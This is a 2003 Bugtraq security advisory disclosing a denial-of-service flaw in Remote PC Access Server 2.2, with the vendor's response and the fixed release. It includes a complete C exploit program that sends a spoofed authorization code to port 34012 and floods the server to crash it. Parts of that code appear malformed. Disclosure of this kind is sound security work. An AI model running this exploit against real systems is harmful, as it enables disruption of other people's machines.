Dear Bugtraq

Here is a full details information about the vulnerability of Remote PC
Access Server 2.2, taken from our advisory (includes the exploit code):

http://www.ytech.co.il/advisories/rpca/rpcaccess.htm

Best Regards, Yaron Tal
YTECH.CO.IL

-----------------------------------------------------
Remote PC Access Server  2.2 DoS Attack Vulnerability
-----------------------------------------------------

Release Date : 26\05\03
Application : Remote PC Access Server 2.2
Platforms : Windows 95/98/ME/NT/2000/XP
Vendor : Remote Access Software
Author : Yaron Tal (yarontal@ytech.co.il)

---------
Overview:
---------

Remote PC Access is fast, compact software for accessing and controlling
any computer from any computer on the Internet or on local area networks
(LAN). View the remote PC's screen and control its keyboard and mouse just
as if you were sitting in front of it. The software transparently works
through firewalls and routers, and has support for dynamic IP addresses.
There is also an option to connect to a remote computer by its nickname
instead of its IP address. (from download.com)

----------------------
Vulnerability Details:
----------------------

How the vulnerability can be exploited?

Remote PC Access Server using authorization code, in order to verify if
Remote PC Access Client has been connected to the local server. The
authorization code is 12 bytes long filled with the next bytes order:

Authorization Code (Hex): 27 00 00 00 04 00 00 00 00 00 00 00 = 12 Bytes

The attacker can build a spoofed client program and use DoS attack, in
order to crash the remote server or remote system. If a local client sends
authorization code to remote server,  the remote server sends
acknowledgment code back to the local client, after this process, by
sending received packets from the remote server, the local client
overflows the remote server.

Solution

I notified Remote Access Software about this vulnerability on 21\04\2003
and worked with them to fix the vulnerability. they now released a new
version of Remote PC Access Server 3.1 with a fix to this vulnerability.
[Download Here]

Vendor Responded

"Your report suggests that the server part of our software can be crashed
by abusing the communication protocol employed between client and server
(namely DoS attack). We are aware of this problem and it affects only a
few places inside the source code. We are releasing a new version in a
week or two which doesn't have this security vulnerability." (Sergey
Stoma)

-------------------------------------------------
Remote PC Access Server 2.2 - Vulnerability Check
-------------------------------------------------

/***************************************************************************
----------------------------------------------------------------------------
 Remote PC Server Version 2.2 - Vulnerability Check (Source Version)
 Copyright (c) 2003 Yaron Tal. All Rights Reserved.
----------------------------------------------------------------------------
** Overview ****************************************************************

   Remote PC Access Server using authorization code, in order to verify
   if Remote PC Access Client has been connected to the local server.
   The authorization code is 12 bytes long filled with the next bytes order:

   Authorization Code (Hex): 27 00 00 00 04 00 00 00 00 00 00 00 = 12 Bytes

   The attacker can build a spoofed client program and use DoS attack,
   in order to crash the remote server or remote system. If a local client
   sends authorization code to remote server, the remote server sends
   acknowledgment code back to the local client, after this process,
   by sending received packets from the remote server, the local client
   overflows the remote server.

** Terms OF Services *******************************************************

You may not use, copy, modify, decompile, disassemble, emulate, clone
rent, lease, sell otherwise reverse engineer, or transfer this program
or any subset of this program, any such unauthorized use shall result
immediate and automatic termination of this license and may result in
criminal and/or civil prosecution.

Yaron Tal is not responsible for any special, incidental, indirect
or consequential damages that may happen when you use this program.
This program can crash remote server or system.

***************************************************************************
    - Website: www.ytech.co.il \ Email: yarontal@ytech.co.il
    - Copyright (C) 2003 Yaron Tal. All Rights Reserved.
***************************************************************************/

#include <stdio.h>
#include <conio.h>
#include <string.h>
#include <winsock.h>

#define WVERSION MAKEWORD(2,2)

void main(int argc, char *argv[])
 

    SOCKET wSocket;
    WSADATA wsaData;
    SOCKADDR_IN wAddress;
    char Ch = 0, Msg[256];

    unsigned char Packet[] = "\x27\x00\x00\x00" //
                             "\x04\x00\x00\x00" // Authorization Code
                             "\x00\x00\x00";    //

    printf("\nRemote PC Server Version 2.2 - Vulnerability Check (Source
Version)\n");
    printf("Copyright (C) 2003 Yaron Tal. All Rights Reserved.\n\n");
    printf("Usage: <%s> <Remote IP Address>\n",argv[0]);

    if (argc < 2) exit(1);

    if (WSAStartup(WVERSION, &wsaData))
    {
        printf("- Error: WSAStartup.\n (%d)", GetLastError());
        exit(1);
    }

    memset(&wAddress, 0, sizeof(wAddress));
    wSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    wAddress.sin_family = AF_INET;
    wAddress.sin_addr.s_addr = inet_addr(argv[1]);
    wAddress.sin_port = htons(34012);

    if (wSocket == INVALID_SOCKET)
    {
        printf("Error: socket() (%d)\n", GetLastError());
        exit(1);
    }

    if (connect(wSocket,(LPSOCKADDR)&wAddress,sizeof(struct sockaddr)) ==
SOCKET_ERROR)
    {
        printf("Error: listen() (%d)\n", GetLastError());
        exit(1);
    }

    printf("Connected To Remote Host...\n");
    printf("Sending Data...\n\n");

    if (send(wSocket, Packet, sizeof(Packet),0) == SOCKET_ERROR)
    {
        printf("- Error: send() (%d)\n", GetLastError());
        exit(1);
    }

    printf("Press ESC to disconnect and exit program.");

    while (Ch !=27)
    {

        if (kbhit()) Ch = getch();

        memset(Msg, 0, sizeof(Msg));
        if (recv(wSocket, Msg, strlen(Msg),0) == SOCKET_ERROR)
        {
            printf("Error: recv() (%d)\n", GetLastError());
            exit(1);
        }

        if (send(wSocket, Msg, sizeof(Msg),0) == SOCKET_ERROR)
        {
            printf("- Error: send() (%d)\n", GetLastError());
            exit(1);
        }

    }

    closesocket(wSocket);
    WSACleanup();

 

------------------------------
Terms OF Services & Copyrights
------------------------------

Disclaimer:

All the information that available in this advisory is Copyright © 2003
Yaron Tal, Yaron Tal is not responsible for any special, incidental,
indirect or consequential damages that may happen when you use any of the
information in this advisory.

About YTECH.CO.IL, In these days, when information security stands in the
first priority of many computer users. you can't allow your privacy to be
vulnerable. We are creative and dynamic company which provides security
software for home\business use, security information consulting,
advisories and web site building services.

For more information about ytech.co.il you may visit http://www.ytech.co.il
or contact us via email: contactus@ytech.co.il.

Copyright © 2003 Yaron Tal. All Rights Reserved Worldwide.


[Editor's note:  This advisory is posted on our site with permission from the author.]